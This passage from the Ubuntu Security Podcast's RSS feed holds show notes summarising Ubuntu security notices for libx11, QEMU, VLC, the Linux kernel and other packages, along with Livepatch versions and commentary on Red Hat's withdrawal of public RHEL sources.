<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3138">CVE-2023-3138</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libx11 mishandled various Request, Event and Error IDs - these IDs get used as
indexes into various arrays and so can be used to trigger OOB writes up -
these IDs get supplied back from the X server to the X client - if were
tricked into connecting to a malicious X server, could then either crash X
client -&gt; DoS or get code execution - in general, it is highly unlikely to be
tricked into connecting to a malicious X server due to the nature of the X
protocol (as the X server usually runs on the local machine)</li>
</ul>
<h3 id="usn-6169-1-gnu-sasl-vulnerability--03-22">[<a href="https://ubuntu.com/security/notices/USN-6169-1">USN-6169-1</a>] GNU SASL vulnerability (03:22)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2469">CVE-2022-2469</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>library and CLI application for the Simple Authentication and Security Layer
(SASL) framework - used by network servers like IMAP/XMPP etc and to
authenticate clients etc
<ul>
<li>e.g. mutt and neomutt both use this</li>
</ul>
</li>
<li>Possible OOB read on server side if client provides crafted auth data -&gt; DoS /
info leak against the server</li>
</ul>
<h3 id="usn-6155-2-requests-vulnerability--04-02">[<a href="https://ubuntu.com/security/notices/USN-6155-2">USN-6155-2</a>] Requests vulnerability (04:02)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32681">CVE-2023-32681</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-199/#usn-6155-1-requests-vulnerability--05-56">[USN-6155-1] Requests vulnerability from Episode 199</a></li>
</ul>
<h3 id="usn-6166-2-libcap2-vulnerability--04-21">[<a href="https://ubuntu.com/security/notices/USN-6166-2">USN-6166-2</a>] libcap2 vulnerability (04:21)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2603">CVE-2023-2603</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-199/#usn-6166-1-libcap2-vulnerabilities--11-35">[USN-6166-1] libcap2 vulnerabilities from Episode 199</a></li>
</ul>
<h3 id="usn-6083-2-cups-filters-vulnerability--04-30">[<a href="https://ubuntu.com/security/notices/USN-6083-2">USN-6083-2</a>] cups-filters vulnerability (04:30)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-24805">CVE-2023-24805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-196/#usn-6083-1-cups-filters-vulnerability--01-03">[USN-6083-1] cups-filters vulnerability from Episode 196</a></li>
</ul>
<h3 id="usn-6156-2-sssd-regression--04-40">[<a href="https://ubuntu.com/security/notices/USN-6156-2">USN-6156-2</a>] SSSD regression (04:40)</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li><a href="/episode-199/#usn-6156-1-sssd-vulnerability--06-11">[USN-6156-1] SSSD vulnerability from Episode 199</a></li>
<li>possible issue if were to install only some of the newer binary packages from
the previous security update - fixed by adding more specific dependency info
in the package metadata but ideally users should just run <code>apt upgrade</code> or use
<code>unattended-upgrades</code> to install security updates as this will upgrade all
installed binary packages to all the newer versions, and not say just <code>apt install sssd</code> which would only pull in some of the binary packages</li>
</ul>
<h3 id="usn-6167-1-qemu-vulnerabilities--05-31">[<a href="https://ubuntu.com/security/notices/USN-6167-1">USN-6167-1</a>] QEMU vulnerabilities (05:31)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0330">CVE-2023-0330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4172">CVE-2022-4172</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4144">CVE-2022-4144</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1050">CVE-2022-1050</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All various memory management issues in different guest drivers, which could
allow a malicious guest to cause QEMU on the host to crash - not really
surprising as the boundary between unprivileged and privileged components is
the literal attack surface in this case and so is where security issues of
this nature will likely be found</li>
</ul>
<h3 id="usn-6176-1-pypdf2-vulnerability--05-57">[<a href="https://ubuntu.com/security/notices/USN-6176-1">USN-6176-1</a>] PyPDF2 vulnerability (05:57)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24859">CVE-2022-24859</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Library for handling PDF files</li>
<li>Possible infinite loop if input PDF was malformed and finished without
containing an expected terminating element - would just keep trying to read
even though there was nothing more to read</li>
</ul>
<h3 id="usn-6170-1-podman-vulnerabilities--06-26">[<a href="https://ubuntu.com/security/notices/USN-6170-1">USN-6170-1</a>] Podman vulnerabilities (06:26)</h3>
<ul>
<li>Affecting Jammy (22.04 LTS)</li>
<li>When using <code>podman play kube</code> to create containers / pods / volumes based on a
k8s yaml, it would always pull in the <code>k8s.gcr.io/pause</code> image - this is not
necessary and it not necessarily maintained and so could present a security
issue as a result</li>
</ul>
<h3 id="usn-6177-1-usn-6179-1-jettison-vulnerabilities--07-01">[<a href="https://ubuntu.com/security/notices/USN-6177-1">USN-6177-1</a>, USN-6179-1] Jettison vulnerabilities (07:01)</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45693">CVE-2022-45693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45685">CVE-2022-45685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40150">CVE-2022-40150</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40149">CVE-2022-40149</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1436">CVE-2023-1436</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Java library for converting between XML and JSON</li>
<li>3 different stack overflows due to recursive parsing implementation for JSON -
so could simply create a JSON structure that had a very deeply nested object
to trigger this - plus an associated memory leak -&gt; OOM - fixed by counting
number of recursions and bailing if get too deep</li>
</ul>
<h3 id="usn-6178-1-svg-plus-plus-library-vulnerabilities--07-37">[<a href="https://ubuntu.com/security/notices/USN-6178-1">USN-6178-1</a>] SVG++ library vulnerabilities (07:37)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44960">CVE-2021-44960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-6246">CVE-2019-6246</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible OOB reads - one in demo code only - not much of a security impact -
still assigned CVSS 6.5 for NULL ptr deref in demo code - shows the limits of
CVSS as a metric - Daniel Stenberg (curl maintainer) has a good discussion of
this on his blog -</li>
<li><a href="https://daniel.haxx.se/blog/2023/03/06/nvd-makes-up-vulnerability-severity-levels/">https://daniel.haxx.se/blog/2023/03/06/nvd-makes-up-vulnerability-severity-levels/</a></li>
<li><a href="https://daniel.haxx.se/blog/2023/06/12/nvd-damage-continued/">https://daniel.haxx.se/blog/2023/06/12/nvd-damage-continued/</a></li>
<li>I even wrote something about this a few years ago -
<a href="https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation">https://ubuntu.com/blog/securing-open-source-through-cve-prioritisation</a> -
there is more to CVEs than just their CVSS score - also CVSS 4 will help a bit
but will still not capture enough nuance, and even if it does, it still won&rsquo;t
stop the problem of CVEs being misclassified due to a lack of deep
understanding by whoever assigns the CVSS score (and in fact this may be made
worse by CVSS 4 since it contains more attributes used to compute a score)</li>
</ul>
<h3 id="usn-6180-1-vlc-media-player-vulnerabilities--09-58">[<a href="https://ubuntu.com/security/notices/USN-6180-1">USN-6180-1</a>] VLC media player vulnerabilities (09:58)</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41325">CVE-2022-41325</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25804">CVE-2021-25804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25803">CVE-2021-25803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25802">CVE-2021-25802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25801">CVE-2021-25801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13428">CVE-2020-13428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19721">CVE-2019-19721</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB reads / write when handling various image or video files -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5948-2-werkzeug-vulnerabilities--10-16">[<a href="https://ubuntu.com/security/notices/USN-5948-2">USN-5948-2</a>] Werkzeug vulnerabilities (10:16)</h3>
<ul>
<li>2 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25577">CVE-2023-25577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23934">CVE-2023-23934</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>various utilities for WSGI applications in python</li>
<li>one issue in cookie parsing which could allow a remote attacker to shadow
other cookies, another CPU-based DoS via unlimited number of multipart form
data parts - since each consumes only a small number of bytes but takes a
reasonable amount of CPU time to parse (and also consumes RAM too)</li>
</ul>
<h3 id="usn-6143-3-firefox-regressions--11-09">[<a href="https://ubuntu.com/security/notices/USN-6143-3">USN-6143-3</a>] Firefox regressions (11:09)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34415">CVE-2023-34415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34417">CVE-2023-34417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34416">CVE-2023-34416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34414">CVE-2023-34414</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>114.0.2 - Upstream regressions in native messaging handlers and some possible crashes as well</li>
</ul>
<h3 id="usn-6181-1-ruby-vulnerabilities--11-24">[<a href="https://ubuntu.com/security/notices/USN-6181-1">USN-6181-1</a>] Ruby vulnerabilities (11:24)</h3>
<ul>
<li>3 CVEs addressed in Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28756">CVE-2023-28756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28755">CVE-2023-28755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33621">CVE-2021-33621</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different ReDoS, 1 issue in handling of responses in the cgi gem could allow
an attacker to modify the response that would then be received by the user via
a HTTP response splitting attack</li>
</ul>
<h3 id="usn-6182-1-pngcheck-vulnerabilities--11-51">[<a href="https://ubuntu.com/security/notices/USN-6182-1">USN-6182-1</a>] pngcheck vulnerabilities (11:51)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35511">CVE-2020-35511</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27818">CVE-2020-27818</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used to verify the integrity of PNG and associated files (used by the
forensics-extra package which contains various forensics and ethical hacking
tools etc)</li>
<li>Ironically this contained a buffer overflow which could be triggered on a
crafted file</li>
</ul>
<h3 id="usn-6171-1-linux-kernel-vulnerabilities--12-29">[<a href="https://ubuntu.com/security/notices/USN-6171-1">USN-6171-1</a>] Linux kernel vulnerabilities (12:29)</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.19
<ul>
<li>22.10 - generic, AWS, Azure. GCP, KVM, Oracle, Raspi, Lowlatency</li>
<li>22.04 - HWE</li>
</ul>
</li>
<li>Various issues allowing local user to trigger deadlock, OOPS (crash), or read
kernel memory (info leak) - none appear to be exploitable remotely</li>
</ul>
<h3 id="usn-6172-1-linux-kernel-vulnerabilities--13-02">[<a href="https://ubuntu.com/security/notices/USN-6172-1">USN-6172-1</a>] Linux kernel vulnerabilities (13:02)</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15
<ul>
<li>22.04 generic, GCP, GKE, Raspi, AWS, Azure, Oracle, KVM, lowlatency etc</li>
</ul>
</li>
<li>5.4
<ul>
<li>20.04 generic, GCP, GKE, Raspi, AWS, Azure, Oracle, KVM, lowlatency etc</li>
</ul>
</li>
<li>Similar set of issues as above</li>
</ul>
<h3 id="usn-6173-1-linux-kernel--oem--vulnerabilities--13-32">[<a href="https://ubuntu.com/security/notices/USN-6173-1">USN-6173-1</a>] Linux kernel (OEM) vulnerabilities (13:32)</h3>
<ul>
<li>
<p>7 CVEs addressed in Jammy (22.04 LTS)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32254">CVE-2023-32254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2156">CVE-2023-2156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>6.1 OEM</p>
</li>
<li>
<p>OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver</p>
<ul>
<li>requires an attacker to create a malicious USB device and insert that into</li>
</ul>
<p>your machine to be able to trigger (shout out to <a href="https://usbguard.github.io/">USBGuard</a>)</p>
</li>
<li>
<p>OOB write in network queuing scheduler</p>
<ul>
<li>able to be triggered though an unprivileged user namespace (again)</li>
</ul>
</li>
<li>
<p><a href="/episode-198/#usn-6130-1-linux-kernel-vulnerabilities--02-23">[USN-6130-1] Linux kernel vulnerabilities from Episode 198</a></p>
</li>
</ul>
<h3 id="usn-6174-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6174-1">USN-6174-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26606">CVE-2023-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.17 OEM</li>
</ul>
<h3 id="usn-6175-1-linux-kernel-vulnerabilities--14-11">[<a href="https://ubuntu.com/security/notices/USN-6175-1">USN-6175-1</a>] Linux kernel vulnerabilities (14:11)</h3>
<ul>
<li>20 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28866">CVE-2023-28866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1989">CVE-2023-1989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1583">CVE-2023-1583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 GA (everything)</li>
<li><a href="/episode-198/#usn-6130-1-linux-kernel-vulnerabilities--02-23">[USN-6130-1] Linux kernel vulnerabilities from Episode 198</a></li>
</ul>
<h3 id="lsn-0095-1-linux-kernel-vulnerability--14-25">[<a href="https://ubuntu.com/security/notices/LSN-0095-1">LSN-0095-1</a>] Linux kernel vulnerability (14:25)</h3>
<ul>
<li>6 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1872">CVE-2023-1872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0386">CVE-2023-0386</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>95.4</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>95.4</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>95.4</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>95.4</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>95.4</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>95.4</td>
          <td>95.4</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>95.4</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>95.4</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency</td>
          <td>95.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>95.4</td>
          <td>95.4</td>
      </tr>
  </tbody>
</table>
<p>To check your kernel type and Livepatch version, enter this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h2 id="goings-on-in-linux-security-community">Goings on in Linux Security Community</h2>
<h3 id="red-hat-to-stop-publicly-releasing-source-code-for-rhel--14-59">Red Hat to stop publicly releasing source code for RHEL (14:59)</h3>
<ul>
<li><a href="https://www.redhat.com/en/blog/furthering-evolution-centos-stream">https://www.redhat.com/en/blog/furthering-evolution-centos-stream</a>
<ul>
<li>Previously would release sources for RHEL to git.centos.org - the repo which
was used for the previous CentOS Linux - a freely available repackaging of
RHEL, more like a downstream - was discontinued at the end of 2021 in favour
of CentOS Stream which is positioned more as an upstream of RHEL now.</li>
<li>By pushing these sources public, allowed others to inspect their work, but
also to create competitor products based off that work - AlmaLinux / Rocky
etc - both of which aim to be community versions of RHEL, bug-for-bug
compatible etc</li>
<li><a href="https://almalinux.org/blog/impact-of-rhel-changes/">https://almalinux.org/blog/impact-of-rhel-changes/</a></li>
<li><a href="https://rockylinux.org/news/2023-06-22-press-release/">https://rockylinux.org/news/2023-06-22-press-release/</a></li>
<li>This change first occurred last week, noticed by the AlmaLinux developers -
RHEL then released the public statement above</li>
</ul>
</li>
<li>Red Hat say CentOS Stream will now be the only public repo for RHEL-related
source code - but this does not necessarily contain all the patches and
updates that end up in the various RHEL packages
<ul>
<li>AlmaLinux plans to then use CentOS Stream to base their security updates
off - as this is still public</li>
<li>Rocky Linux is not so open about how they plan to deal with this - also
looks like they will use CentOS Stream as their upstream - but will this
then be bug-for-bug compatible with RHEL as they claim?</li>
</ul>
</li>
<li>Red Hat also say the sources for RHEL will be available to customers and
partners via their usual customer portal - however the standard RHEL license
agreement prohibits these from being used to develop competitor products etc</li>
<li>Doesn&rsquo;t have a huge impact on Ubuntu as in general we take our patches direct
from the upstream projects - and when we have to backport these to older
versions, they are not necessarily the same version as used in RHEL anyway so
we don&rsquo;t often use patches from RHEL</li>
<li>Will be interesting to see what impact this does have on AlmaLinux and Rocky
Linux</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E200.mp3" length="20478178" type="audio/mpeg" /><itunes:duration>1193</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 199
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-199/</link>
          <pubDate>Fri, 16 Jun 2023 18:47:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>80d53c07cf49e3f9fafba0661c170262d228b0b6f2ea02d3353b846c55e44ffa666c2a4021d31a2c272b95bb5296ee3b84f676a8ffd8ef62b0f7b463942a696e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 199</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
  plus we discuss Google's findings on the `io_uring` kernel subsystem and we look
  at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
  plus we discuss Google's findings on the `io_uring` kernel subsystem and we look
  at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
  and more.
  </itunes:summary>
        <description>  For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
  plus we discuss Google's findings on the `io_uring` kernel subsystem and we look
  at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
  and more.
  </description>
        <googleplay:description>  For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
  plus we discuss Google's findings on the `io_uring` kernel subsystem and we look
  at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
  and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
